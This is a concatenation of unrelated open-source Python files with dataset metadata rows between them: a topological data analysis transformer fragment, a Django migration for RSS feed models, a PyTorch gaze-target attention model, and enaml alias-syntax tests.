n_jobs=None):
self.metric = metric
self.metric_params = metric_params
self.order = order
self.n_jobs = n_jobs
def fit(self, X, y=None):
"""Store all observed homology dimensions in
:attr:`homology_dimensions_` and compute
:attr:`effective_metric_params`. Then, return the estimator.
This method is there to implement the usual scikit-learn API and hence
work in pipelines.
Parameters
----------
X : ndarray, shape (n_samples_fit, n_features, 3)
Input data. Array of persistence diagrams, each a collection of
triples [b, d, q] representing persistent topological features
through their birth (b), death (d) and homology dimension (q).
y : None
There is no need for a target in a transformer, yet the pipeline
API requires this parameter.
Returns
-------
self : object
"""
X = check_diagram(X)
if self.metric_params is None:
self.effective_metric_params_ = {}
else:
self.effective_metric_params_ = self.metric_params.copy()
hyperparameters = self.get_params().copy()
if self.order is not None:
if isinstance(self.order, int):
hyperparameters['order'] = float(self.order)
else:
hyperparameters['order'] = 1. # Automatically pass validate_params
validate_params(hyperparameters, self._hyperparameters)
validate_metric_params(self.metric, self.effective_metric_params_)
self.homology_dimensions_ = sorted(set(X[0, :, 2]))
if self.metric in ['landscape', 'heat', 'betti']:
self.effective_metric_params_['samplings'], \
self.effective_metric_params_['step_sizes'] = \
_discretize(X, **self.effective_metric_params_)
self._X = X
return self
def transform(self, X, y=None):
"""Computes a distance or vector of distances between the diagrams in
`X` and the diagrams seen in :meth:`fit`.
Parameters
----------
X : ndarray, shape (n_samples, n_features, 3)
Input data. Array of persistence diagrams, each a collection of
triples [b, d, q] representing persistent topological features
through their birth (b), death (d) and homology dimension (q).
y : None
There is no need for a target in a transformer, yet the pipeline
API requires this parameter.
Returns
-------
Xt : ndarray, shape (n_samples_fit, n_samples, n_homology_dimensions) \
if `order` is ``None``, else (n_samples_fit, n_samples)
Distance matrix or collection of distance matrices between
diagrams in `X` and diagrams seen in :meth:`fit`. In the
second case, index i along axis 2 corresponds to the i-th
homology dimension in :attr:`homology_dimensions_`.
"""
check_is_fitted(self, ['effective_metric_params_',
'homology_dimensions_'])
X = check_diagram(X)
if np.array_equal(X, self._X):
X2 = None
else:
X2 = X
Xt = _parallel_pairwise(self._X, X2, self.metric,
self.effective_metric_params_,
self.homology_dimensions_,
self.n_jobs)
if self.order is not None:
Xt = np.linalg.norm(Xt, axis=2, ord=self.order)
return Xt
class Amplitude(BaseEstimator, TransformerMixin):
"""`Amplitudes <https://giotto.ai/theory>`_ of persistence diagrams,
constructed from the amplitudes of their subdiagrams with constant
homology dimension.
Given a single persistence diagram consisting of birth-death-dimension
triples [b, d, q], a vector of amplitudes or a single scalar amplitude is
calculated according to the following steps:
1. All diagrams are partitioned into subdiagrams corresponding to
distinct homology dimensions.
2. The amplitude of each subdiagram is calculated according to the
parameters `metric` and `metric_params`. This gives a vector of
amplitudes, :math:`\\mathbf{a} = (a_{q_1}, \\ldots, a_{q_n})`.
3. The final result is either :math:`\\mathbf{a}` itself or
a norm of :math:`\\mathbf{a}`.
Parameters
----------
metric : ``'bottleneck'`` | ``'wasserstein'`` | ``'landscape'`` | \
``'betti'`` | ``'heat'``, optional, default: ``'landscape'``
Distance or dissimilarity function used to define the amplitude of
a subdiagram as its distance from the diagonal diagram:
- ``'bottleneck'`` and ``'wasserstein'`` refer to the identically named
perfect-matching--based notions of distance.
- ``'landscape'`` refers to the :math:`L^p` distance between
persistence landscapes.
- ``'betti'`` refers to the :math:`L^p` distance between Betti curves.
- ``'heat'`` refers to the :math:`L^p` distance between
Gaussian-smoothed diagrams.
metric_params : dict or None, optional, default: ``None``
Additional keyword arguments for the metric function:
- If ``metric == 'bottleneck'`` there are no available arguments.
- If ``metric == 'wasserstein'`` the only argument is `p` (int,
default: ``2``).
- If ``metric == 'betti'`` the available arguments are `p` (float,
default: ``2.``) and `n_values` (int, default: ``100``).
- If ``metric == 'landscape'`` the available arguments are `p`
(float, default: ``2.``), `n_values` (int, default: ``100``) and
`n_layers` (int, default: ``1``).
- If ``metric == 'heat'`` the available arguments are `p` (float,
default: ``2.``), `sigma` (float, default: ``1.``) and `n_values`
(int, default: ``100``).
order : float or None, optional, default: ``2.``
If ``None``, :meth:`transform` returns for each diagram a vector of
amplitudes corresponding to the dimensions in
:attr:`homology_dimensions_`. Otherwise, the :math:`p`-norm of
these vectors with :math:`p` equal to `order` is taken.
n_jobs : int or None, optional, default: ``None``
The number of jobs to use for the computation. ``None`` means 1 unless
in a :obj:`joblib.parallel_backend` context. ``-1`` means using all
processors.
Attributes
----------
effective_metric_params_ : dict
Dictionary containing all information present in `metric_params` as
well as on any relevant quantities computed in :meth:`fit`.
homology_dimensions_ : list
Homology dimensions seen in :meth:`fit`, sorted in ascending order.
See also
--------
PairwiseDistance, Scaler, Filtering, \
BettiCurve, PersistenceLandscape, \
HeatKernel, giotto.homology.VietorisRipsPersistence
Notes
-----
To compute amplitudes without first splitting the computation between
different homology dimensions, data should be first transformed by an
instance of :class:`ForgetDimension`.
"""
_hyperparameters = {'order': [float, (1, np.inf)]}
def __init__(self, metric='landscape', metric_params=None, order=2.,
n_jobs=None):
self.metric = metric
self.metric_params = metric_params
self.order = order
self.n_jobs = n_jobs
def fit(self, X, y=None):
"""Store all observed homology dimensions in
:attr:`homology_dimensions_` and compute
:attr:`effective_metric_params`. Then, return the estimator.
This method is there to implement the usual scikit-learn API and hence
work in pipelines.
Parameters
----------
X : ndarray, shape (n_samples, n_features, 3)
Input data. Array of persistence diagrams, each a collection of
triples [b, d, q] representing persistent topological features
through their birth (b), death (d) and homology dimension (q).
y : None
There is no need for a target in a transformer, yet the pipeline
API requires this parameter.
Returns
-------
self : object
"""
if self.metric_params is None:
self.effective_metric_params_ = {}
else:
self.effective_metric_params_ = self.metric_params.copy()
hyperparameters = self.get_params().copy()
if self.order is not None:
if isinstance(self.order, int):
hyperparameters['order'] = float(self.order)
else:
hyperparameters['order'] = 1. # Automatically pass validate_params
validate_params(hyperparameters, self._hyperparameters)
validate_metric_params(self.metric, self.effective_metric_params_)
X = check_diagram(X)
self.homology_dimensions_ = sorted(set(X[0, :, 2]))
if self.metric in ['landscape', 'heat', 'betti']:
self.effective_metric_params_['samplings'], \
self.effective_metric_params_['step_sizes'] = \
_discretize(X, **self.effective_metric_params_)
return self
def transform(self, X, y=None):
"""Compute the amplitudes or amplitude vectors of diagrams in `X`.
Parameters
----------
X : ndarray, shape (n_samples, n_features, 3)
Input data. Array of persistence diagrams, each a collection of
triples [b, d, q] representing persistent topological features
through their birth (b), death (d) and homology dimension (q).
y : None
There is no need for a target in a transformer, yet the pipeline
API requires this parameter.
Returns
-------
Xt : ndarray, shape (n_samples, n_homology_dimensions) if `order` \
is ``None``, else (n_samples, 1)
Amplitudes or amplitude vectors of the diagrams in `X`. In the
second case, index i along axis 1 corresponds to the i-th
homology dimension in :attr:`homology_dimensions_`.
"""
check_is_fitted(self, ['effective_metric_params_',
'homology_dimensions_'])
X = check_diagram(X)
Xt = _parallel_amplitude(X, self.metric,
self.effective_metric_params_,
self.homology_dimensions_,
self.n_jobs)
if self.order is None:
return Xt
Xt = np.linalg.norm(Xt, axis=1, ord=self.order).reshape(-1, 1)
return Xt
| 41.634921
| 79
| 0.6206
| 1,851
| 15,738
| 5.162615
| 0.161534
| 0.048974
| 0.043951
| 0.041859
| 0.801486
| 0.769883
| 0.746756
| 0.746756
| 0.73378
| 0.714734
| 0
| 0.007004
| 0.274241
| 15,738
| 377
| 80
| 41.745358
| 0.829627
| 0.665205
| 0
| 0.802198
| 0
| 0
| 0.050934
| 0.011642
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065934
| false
| 0
| 0.065934
| 0
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
962df033e393c78b064fe61a77a627df4a29e5f8
| 1,821
|
py
|
Python
|
rsscraper/feeds/migrations/0002_auto_20200104_0011.py
|
Sunno/rsscraper
|
a9897d507980ec4525e8521188cf76203829caca
|
[
"MIT"
] | null | null | null |
rsscraper/feeds/migrations/0002_auto_20200104_0011.py
|
Sunno/rsscraper
|
a9897d507980ec4525e8521188cf76203829caca
|
[
"MIT"
] | null | null | null |
rsscraper/feeds/migrations/0002_auto_20200104_0011.py
|
Sunno/rsscraper
|
a9897d507980ec4525e8521188cf76203829caca
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.9 on 2020-01-04 04:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('feeds', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='feed',
name='favorite',
),
migrations.AddField(
model_name='feed',
name='last_fetch',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='feed',
name='last_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='feed',
name='title',
field=models.CharField(blank=True, default='', max_length=256),
),
migrations.AddField(
model_name='feeditem',
name='author',
field=models.CharField(blank=True, default='', max_length=256),
),
migrations.AddField(
model_name='feeditem',
name='content',
field=models.TextField(blank=True, default=''),
),
migrations.AddField(
model_name='feeditem',
name='favorite',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='feeditem',
name='read',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='feeditem',
name='summary',
field=models.TextField(blank=True, default=''),
),
migrations.AddField(
model_name='feeditem',
name='title',
field=models.CharField(blank=True, default='', max_length=256),
),
]
| 28.904762
| 75
| 0.532674
| 162
| 1,821
| 5.888889
| 0.308642
| 0.09434
| 0.216981
| 0.254717
| 0.759958
| 0.759958
| 0.759958
| 0.714885
| 0.714885
| 0.714885
| 0
| 0.023333
| 0.341021
| 1,821
| 62
| 76
| 29.370968
| 0.771667
| 0.024712
| 0
| 0.75
| 1
| 0
| 0.086246
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.017857
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
96bcbd75ea7e93a269f880a91d9722c065ddd1a9
| 19,319
|
py
|
Python
|
model.py
|
ejcgt/attention-target-detection
|
acd264a3c9e6002b71244dea8c1873e5c5818500
|
[
"MIT"
] | 101
|
2020-03-05T06:47:05.000Z
|
2022-03-31T03:42:51.000Z
|
model.py
|
ejcgt/attention-target-detection
|
acd264a3c9e6002b71244dea8c1873e5c5818500
|
[
"MIT"
] | 12
|
2020-03-12T11:10:57.000Z
|
2022-01-14T03:58:03.000Z
|
model.py
|
ejcgt/attention-target-detection
|
acd264a3c9e6002b71244dea8c1873e5c5818500
|
[
"MIT"
] | 31
|
2020-06-17T22:00:13.000Z
|
2022-01-20T06:18:20.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.utils.rnn import pack_padded_sequence, PackedSequence
import math
from lib.pytorch_convolutional_rnn import convolutional_rnn
import numpy as np
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class BottleneckConvLSTM(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BottleneckConvLSTM, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.bn_ds = nn.BatchNorm2d(planes * self.expansion)
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
# RW edit: handles batch_size==1
if out.shape[0] > 1:
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
# RW edit: handles batch_size==1
if out.shape[0] > 1:
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
# RW edit: handles batch_size==1
if out.shape[0] > 1:
out = self.bn3(out)
if self.downsample is not None:
# RW edit: handles batch_size==1
if out.shape[0] > 1:
residual = self.downsample(x)
residual = self.bn_ds(residual)
else:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class ModelSpatial(nn.Module):
# Define a ResNet 50-ish arch
def __init__(self, block = Bottleneck, layers_scene = [3, 4, 6, 3, 2], layers_face = [3, 4, 6, 3, 2]):
# Resnet Feature Extractor
self.inplanes_scene = 64
self.inplanes_face = 64
super(ModelSpatial, self).__init__()
# common
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.avgpool = nn.AvgPool2d(7, stride=1)
# scene pathway
self.conv1_scene = nn.Conv2d(4, 64, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1_scene = nn.BatchNorm2d(64)
self.layer1_scene = self._make_layer_scene(block, 64, layers_scene[0])
self.layer2_scene = self._make_layer_scene(block, 128, layers_scene[1], stride=2)
self.layer3_scene = self._make_layer_scene(block, 256, layers_scene[2], stride=2)
self.layer4_scene = self._make_layer_scene(block, 512, layers_scene[3], stride=2)
self.layer5_scene = self._make_layer_scene(block, 256, layers_scene[4], stride=1) # additional to resnet50
# face pathway
self.conv1_face = nn.Conv2d(3, 64, kernel_size = 7, stride = 2, padding = 3, bias = False)
self.bn1_face = nn.BatchNorm2d(64)
self.layer1_face = self._make_layer_face(block, 64, layers_face[0])
self.layer2_face = self._make_layer_face(block, 128, layers_face[1], stride=2)
self.layer3_face = self._make_layer_face(block, 256, layers_face[2], stride=2)
self.layer4_face = self._make_layer_face(block, 512, layers_face[3], stride=2)
self.layer5_face = self._make_layer_face(block, 256, layers_face[4], stride=1) # additional to resnet50
# attention
self.attn = nn.Linear(1808, 1*7*7)
# encoding for saliency
self.compress_conv1 = nn.Conv2d(2048, 1024, kernel_size=1, stride=1, padding=0, bias=False)
self.compress_bn1 = nn.BatchNorm2d(1024)
self.compress_conv2 = nn.Conv2d(1024, 512, kernel_size=1, stride=1, padding=0, bias=False)
self.compress_bn2 = nn.BatchNorm2d(512)
# encoding for in/out
self.compress_conv1_inout = nn.Conv2d(2048, 512, kernel_size=1, stride=1, padding=0, bias=False)
self.compress_bn1_inout = nn.BatchNorm2d(512)
self.compress_conv2_inout = nn.Conv2d(512, 1, kernel_size=1, stride=1, padding=0, bias=False)
self.compress_bn2_inout = nn.BatchNorm2d(1)
self.fc_inout = nn.Linear(49, 1)
# decoding
self.deconv1 = nn.ConvTranspose2d(512, 256, kernel_size=3, stride=2)
self.deconv_bn1 = nn.BatchNorm2d(256)
self.deconv2 = nn.ConvTranspose2d(256, 128, kernel_size=3, stride=2)
self.deconv_bn2 = nn.BatchNorm2d(128)
self.deconv3 = nn.ConvTranspose2d(128, 1, kernel_size=4, stride=2)
self.deconv_bn3 = nn.BatchNorm2d(1)
self.conv4 = nn.Conv2d(1, 1, kernel_size=1, stride=1)
# Initialize weights
for m in self.modules():
if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer_scene(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes_scene != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes_scene, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes_scene, planes, stride, downsample))
self.inplanes_scene = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes_scene, planes))
return nn.Sequential(*layers)
def _make_layer_face(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes_face != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes_face, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes_face, planes, stride, downsample))
self.inplanes_face = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes_face, planes))
return nn.Sequential(*layers)
def forward(self, images, head, face):
face = self.conv1_face(face)
face = self.bn1_face(face)
face = self.relu(face)
face = self.maxpool(face)
face = self.layer1_face(face)
face = self.layer2_face(face)
face = self.layer3_face(face)
face = self.layer4_face(face)
face_feat = self.layer5_face(face)
# reduce head channel size by max pooling: (N, 1, 224, 224) -> (N, 1, 28, 28)
head_reduced = self.maxpool(self.maxpool(self.maxpool(head))).view(-1, 784)
# reduce face feature size by avg pooling: (N, 1024, 7, 7) -> (N, 1024, 1, 1)
face_feat_reduced = self.avgpool(face_feat).view(-1, 1024)
# get and reshape attention weights such that it can be multiplied with scene feature map
attn_weights = self.attn(torch.cat((head_reduced, face_feat_reduced), 1))
attn_weights = attn_weights.view(-1, 1, 49)
attn_weights = F.softmax(attn_weights, dim=2) # soft attention weights single-channel
attn_weights = attn_weights.view(-1, 1, 7, 7)
im = torch.cat((images, head), dim=1)
im = self.conv1_scene(im)
im = self.bn1_scene(im)
im = self.relu(im)
im = self.maxpool(im)
im = self.layer1_scene(im)
im = self.layer2_scene(im)
im = self.layer3_scene(im)
im = self.layer4_scene(im)
scene_feat = self.layer5_scene(im)
# attn_weights = torch.ones(attn_weights.shape)/49.0
attn_applied_scene_feat = torch.mul(attn_weights, scene_feat) # (N, 1, 7, 7) # applying attention weights on scene feat
scene_face_feat = torch.cat((attn_applied_scene_feat, face_feat), 1)
# scene + face feat -> in/out
encoding_inout = self.compress_conv1_inout(scene_face_feat)
encoding_inout = self.compress_bn1_inout(encoding_inout)
encoding_inout = self.relu(encoding_inout)
encoding_inout = self.compress_conv2_inout(encoding_inout)
encoding_inout = self.compress_bn2_inout(encoding_inout)
encoding_inout = self.relu(encoding_inout)
encoding_inout = encoding_inout.view(-1, 49)
encoding_inout = self.fc_inout(encoding_inout)
# scene + face feat -> encoding -> decoding
encoding = self.compress_conv1(scene_face_feat)
encoding = self.compress_bn1(encoding)
encoding = self.relu(encoding)
encoding = self.compress_conv2(encoding)
encoding = self.compress_bn2(encoding)
encoding = self.relu(encoding)
x = self.deconv1(encoding)
x = self.deconv_bn1(x)
x = self.relu(x)
x = self.deconv2(x)
x = self.deconv_bn2(x)
x = self.relu(x)
x = self.deconv3(x)
x = self.deconv_bn3(x)
x = self.relu(x)
x = self.conv4(x)
return x, torch.mean(attn_weights, 1, keepdim=True), encoding_inout
class ModelSpatioTemporal(nn.Module):
# Define a ResNet 50-ish arch
def __init__(self, block=BottleneckConvLSTM, num_lstm_layers = 1, bidirectional = False, layers_scene = [3, 4, 6, 3, 2], layers_face = [3, 4, 6, 3, 2]):
# Resnet Feature Extractor
self.inplanes_scene = 64
self.inplanes_face = 64
super(ModelSpatioTemporal, self).__init__()
# common
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.avgpool = nn.AvgPool2d(7, stride=1)
# scene pathway
self.conv1_scene = nn.Conv2d(4, 64, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1_scene = nn.BatchNorm2d(64)
self.layer1_scene = self._make_layer_scene(block, 64, layers_scene[0])
self.layer2_scene = self._make_layer_scene(block, 128, layers_scene[1], stride=2)
self.layer3_scene = self._make_layer_scene(block, 256, layers_scene[2], stride=2)
self.layer4_scene = self._make_layer_scene(block, 512, layers_scene[3], stride=2)
self.layer5_scene = self._make_layer_scene(block, 256, layers_scene[4], stride=1) # additional to resnet50
# face pathway
self.conv1_face = nn.Conv2d(3, 64, kernel_size = 7, stride = 2, padding = 3, bias = False)
self.bn1_face = nn.BatchNorm2d(64)
self.layer1_face = self._make_layer_face(block, 64, layers_face[0])
self.layer2_face = self._make_layer_face(block, 128, layers_face[1], stride=2)
self.layer3_face = self._make_layer_face(block, 256, layers_face[2], stride=2)
self.layer4_face = self._make_layer_face(block, 512, layers_face[3], stride=2)
self.layer5_face = self._make_layer_face(block, 256, layers_face[4], stride=1) # additional to resnet50
# attention
self.attn = nn.Linear(1808, 1*7*7)
# encoding for saliency
self.compress_conv1 = nn.Conv2d(2048, 1024, kernel_size=1, stride=1, padding=0, bias=False)
self.compress_bn1 = nn.BatchNorm2d(1024)
self.compress_conv2 = nn.Conv2d(1024, 512, kernel_size=1, stride=1, padding=0, bias=False)
self.compress_bn2 = nn.BatchNorm2d(512)
# encoding for in/out
self.compress_conv1_inout = nn.Conv2d(2048, 512, kernel_size=1, stride=1, padding=0, bias=False)
self.compress_bn1_inout = nn.BatchNorm2d(512)
self.compress_conv2_inout = nn.Conv2d(512, 1, kernel_size=1, stride=1, padding=0, bias=False)
self.compress_bn2_inout = nn.BatchNorm2d(1)
self.fc_inout = nn.Linear(49, 1)
self.convlstm_scene = convolutional_rnn.Conv2dLSTM(in_channels=512,
out_channels=512,
kernel_size=3,
num_layers=num_lstm_layers,
bidirectional=bidirectional,
batch_first=True,
stride=1,
dropout=0.5)
self.deconv1 = nn.ConvTranspose2d(512, 256, kernel_size=3, stride=2)
self.deconv_bn1 = nn.BatchNorm2d(256)
self.deconv2 = nn.ConvTranspose2d(256, 128, kernel_size=3, stride=2)
self.deconv_bn2 = nn.BatchNorm2d(128)
self.deconv3 = nn.ConvTranspose2d(128, 1, kernel_size=4, stride=2)
self.deconv_bn3 = nn.BatchNorm2d(1)
self.conv4 = nn.Conv2d(1, 1, kernel_size=1, stride=1)
# Initialize weights
for m in self.modules():
if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer_scene(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes_scene != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes_scene, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes_scene, planes, stride, downsample))
self.inplanes_scene = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes_scene, planes))
return nn.Sequential(*layers)
def _make_layer_face(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes_face != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes_face, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes_face, planes, stride, downsample))
self.inplanes_face = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes_face, planes))
return nn.Sequential(*layers)
def forward(self, images, head, face, hidden_scene: tuple = None, batch_sizes: list = None):
face = self.conv1_face(face)
face = self.bn1_face(face)
face = self.relu(face)
face = self.maxpool(face)
face = self.layer1_face(face)
face = self.layer2_face(face)
face = self.layer3_face(face)
face = self.layer4_face(face)
face_feat = self.layer5_face(face)
# reduce head channel size by max pooling: (N, 1, 224, 224) -> (N, 1, 28, 28)
head_reduced = self.maxpool(self.maxpool(self.maxpool(head))).view(-1, 784)
# reduce face feature size by avg pooling: (N, 1024, 7, 7) -> (N, 1024, 1, 1)
face_feat_reduced = self.avgpool(face_feat).view(-1, 1024)
# get and reshape attention weights such that it can be multiplied with scene feature map
attn_weights = self.attn(torch.cat((head_reduced, face_feat_reduced), 1))
attn_weights = attn_weights.view(-1, 1, 49)
attn_weights = F.softmax(attn_weights, dim=2) # soft attention weights single-channel
attn_weights = attn_weights.view(-1, 1, 7, 7)
im = torch.cat((images, head), dim=1)
im = self.conv1_scene(im)
im = self.bn1_scene(im)
im = self.relu(im)
im = self.maxpool(im)
im = self.layer1_scene(im)
im = self.layer2_scene(im)
im = self.layer3_scene(im)
im = self.layer4_scene(im)
scene_feat = self.layer5_scene(im)
attn_applied_scene_feat = torch.mul(attn_weights, scene_feat) # (N, 1, 7, 7) # applying attention weights on scene feat
scene_face_feat = torch.cat((attn_applied_scene_feat, face_feat), 1)
# scene + face feat -> in/out
encoding_inout = self.compress_conv1_inout(scene_face_feat)
encoding_inout = self.compress_bn1_inout(encoding_inout)
encoding_inout = self.relu(encoding_inout)
encoding_inout = self.compress_conv2_inout(encoding_inout)
encoding_inout = self.compress_bn2_inout(encoding_inout)
encoding_inout = self.relu(encoding_inout)
# scene + face feat -> encoding -> decoding
encoding = self.compress_conv1(scene_face_feat)
encoding = self.compress_bn1(encoding)
encoding = self.relu(encoding)
encoding = self.compress_conv2(encoding)
encoding = self.compress_bn2(encoding)
encoding = self.relu(encoding)
# RW edit: x should be of shape (size, channel, width, height)
x_pad = PackedSequence(encoding, batch_sizes)
y, hx = self.convlstm_scene(x_pad, hx=hidden_scene)
deconv = y.data
inout_val = encoding_inout.view(-1, 49)
inout_val = self.fc_inout(inout_val)
deconv = self.deconv1(deconv)
if encoding.shape[0] > 1:
deconv = self.deconv_bn1(deconv)
deconv = self.relu(deconv)
deconv = self.deconv2(deconv)
if encoding.shape[0] > 1:
deconv = self.deconv_bn2(deconv)
deconv = self.relu(deconv)
deconv = self.deconv3(deconv)
if encoding.shape[0] > 1:
deconv = self.deconv_bn3(deconv)
deconv = self.relu(deconv)
deconv = self.conv4(deconv)
return deconv, inout_val, hx
| 43.219239
| 156
| 0.618562
| 2,552
| 19,319
| 4.509404
| 0.080329
| 0.032152
| 0.019117
| 0.020681
| 0.904501
| 0.901025
| 0.901025
| 0.88747
| 0.88747
| 0.877303
| 0
| 0.052961
| 0.271857
| 19,319
| 446
| 157
| 43.316144
| 0.765124
| 0.07547
| 0
| 0.832845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035191
| false
| 0
| 0.020528
| 0
| 0.096774
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73a95a549e48961227b72139c22f512710490c7b
| 16,747
|
py
|
Python
|
tests/test_alias.py
|
rogererens/enaml
|
06cd917dfa4f8b924e871a8c6360ce3ef2e45971
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
tests/test_alias.py
|
rogererens/enaml
|
06cd917dfa4f8b924e871a8c6360ce3ef2e45971
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
tests/test_alias.py
|
rogererens/enaml
|
06cd917dfa4f8b924e871a8c6360ce3ef2e45971
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
#------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from textwrap import dedent
import pytest
from utils import compile_source
#------------------------------------------------------------------------------
# Alias Syntax
#------------------------------------------------------------------------------
def test_syntax_1():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pb
PushButton: pb:
name = 'button'
enamldef Main(Window):
Content:
name = 'content'
""")
compile_source(source, 'Main')
def test_syntax_2():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pc: pb
PushButton: pb:
name = 'button'
enamldef Main(Window):
Content:
name = 'content'
""")
compile_source(source, 'Main')
def test_syntax_3():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pc: pb.text
PushButton: pb:
name = 'button'
enamldef Main(Window):
Content:
name = 'content'
""")
compile_source(source, 'Main')
#------------------------------------------------------------------------------
# Bad Alias Syntax
#------------------------------------------------------------------------------
def test_bad_syntax_1():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pb.text
PushButton: pb:
text = 'spam'
enamldef Main(Window):
Content:
name = 'content'
""")
with pytest.raises(SyntaxError):
compile_source(source, 'Main')
def test_bad_syntax_2():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pb text
PushButton: pb:
text = 'spam'
enamldef Main(Window):
Content:
name = 'content'
""")
with pytest.raises(SyntaxError):
compile_source(source, 'Main')
def test_bad_syntax_3():
source = dedent("""\
from enaml.widgets.api import *
enamldef Content(Container):
alias pb: pb text
PushButton: pb:
text = 'spam'
enamldef Main(Window):
Content:
name = 'content'
""")
with pytest.raises(SyntaxError):
compile_source(source, 'Main')
#------------------------------------------------------------------------------
